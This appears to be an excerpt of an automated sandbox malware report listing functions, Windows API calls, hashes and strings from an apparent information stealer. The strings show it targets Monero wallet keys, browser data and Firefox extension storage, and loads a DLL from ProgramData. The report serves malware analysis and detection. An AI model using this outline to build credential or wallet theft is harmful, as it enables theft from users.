                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: e20ca0cfe22175916fc8100a9c76eb96413e366f72a8d6b36348af010e8dc0b0
                                    • Instruction ID: a9e71109c1e19ad62ebd4dc58cd8f2441c5474a0f4b384f3f067696359e691ab
                                    • Opcode Fuzzy Hash: e20ca0cfe22175916fc8100a9c76eb96413e366f72a8d6b36348af010e8dc0b0
                                    • Instruction Fuzzy Hash: 142130B1A44308AFDB00DF94ED49FAEBBB8FB49711F104159F616A7280CB75A9009FA0
                                    Function 00C8A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00C8A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: 33221c8004a856578ab917f7c0d29ed2e367ac98d2b19e7170a68cd3829d2903
                                    • Instruction ID: 8e58817d9aba42598d104c0a84f6d8c89b910d959a390fbf07e8a8bdb6b97c7f
                                    • Opcode Fuzzy Hash: 33221c8004a856578ab917f7c0d29ed2e367ac98d2b19e7170a68cd3829d2903
                                    • Instruction Fuzzy Hash: 5DF01D7564C308EEE710BB66FC4CB5A32D8A34630AF10052AE70A971E0C7B49984EB56
                                    Function 00C98EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C996AE,00000000), ref: 00C98EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C98EF2
                                    • wsprintfW.USER32 ref: 00C98F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 7f8079757920f42691c939fb2e39a7386e9cf88d8b99c2ba1dc8b807ff6e96fe
                                    • Instruction ID: 002aa4dfb5b5c2fe8a39f73f33b21c12e7aaf547ac5093a1c07aa72a1fb3f77b
                                    • Opcode Fuzzy Hash: 7f8079757920f42691c939fb2e39a7386e9cf88d8b99c2ba1dc8b807ff6e96fe
                                    • Instruction Fuzzy Hash: 91E0EC75A4830DBBDB10EB94ED0AE6D77BCEB05702F100194FE0A97380DA719E10AB95
                                    Function 00C8A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00C8AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 00C8ADEC
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 340e67b39c36063f24fba19223921bd4cfc248dd934c1d4bc7cd9fc54adda3dc
                                    • Instruction ID: cd3b30ba571eedb09b2129e251222e00f1e522b3856cbbfe500dc664243ef2de
                                    • Opcode Fuzzy Hash: 340e67b39c36063f24fba19223921bd4cfc248dd934c1d4bc7cd9fc54adda3dc
                                    • Instruction Fuzzy Hash: D2E1DF729101189BCF04FBA4DDAAEEE733DAF14301F508599F516760A1EF306B48DBA6
                                    Function 00C8D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8D581
                                    • lstrlen.KERNEL32(00000000), ref: 00C8D798
                                    • lstrlen.KERNEL32(00000000), ref: 00C8D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: aecb8d56f886d5257a71c8a0350cd30a7533c7b21daadaeeffe565f049aea879
                                    • Instruction ID: 22749bbbbae486333f7a3352f5639a179fc405f9f7738a612aa56ce455bf992b
                                    • Opcode Fuzzy Hash: aecb8d56f886d5257a71c8a0350cd30a7533c7b21daadaeeffe565f049aea879
                                    • Instruction Fuzzy Hash: BB91EF729101089BCF04FBA4DDAAEEE7339AF54305F504569F51766091EF306B08EBE6
                                    Function 00C8D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8D901
                                    • lstrlen.KERNEL32(00000000), ref: 00C8DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 00C8DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 91d3c1b8746c7107ca46a8ce804782499403a1c7458b64e8d2f8fa7dcafd0ae0
                                    • Instruction ID: 45787511f4f903f1a74402a1450e8a149189ff3295aa1774342150d6b25e9521
                                    • Opcode Fuzzy Hash: 91d3c1b8746c7107ca46a8ce804782499403a1c7458b64e8d2f8fa7dcafd0ae0
                                    • Instruction Fuzzy Hash: FE81EE729102089BCF04FBA4DCAAEEE7379AF54305F504568F51766091EF306B08EBE6
                                    Function 00CFFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: c6ad5a36e38f578d90953e21c635b940af0540d73b3ce44daead2ead3fc7ac56
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: 0951C27260020AAFEB798F95C841BBA77A4FF01310F24413DEA59975D1E731ED81DBA2
                                    Function 00C8A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C8A664
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: 2e459ef61943c662edccc3fa8ac96bd6e7d3eafcb5c5905c588f40e3affbc4df
                                    • Instruction ID: 429525be7e71dc86d8e5dcc5fd54f0cd3adb3313070db6412caa48dbeee07efa
                                    • Opcode Fuzzy Hash: 2e459ef61943c662edccc3fa8ac96bd6e7d3eafcb5c5905c588f40e3affbc4df
                                    • Instruction Fuzzy Hash: 52515F70A00208EFDF14EFA4CD96FED77B5AF41348F008118F90A5B691EB70AA45EB95
                                    Function 00C8F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CA1678,00CA0D93), ref: 00C8F64C
                                    • lstrlen.KERNEL32(00000000), ref: 00C8F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 2ec513ea9f651af2a1a79084ea7621bb15edf02a82ad73a16c19b3dd9bfa0047
                                    • Instruction ID: cc70797e3a90fb93f1d29052e48a87bdf2a31c9c8e07e0efe55504f7b43a0a1e
                                    • Opcode Fuzzy Hash: 2ec513ea9f651af2a1a79084ea7621bb15edf02a82ad73a16c19b3dd9bfa0047
                                    • Instruction Fuzzy Hash: 2E511C72D00108ABCF04FBA4DDAADED7379AF54304F408568F81667191EE346B08EBA6
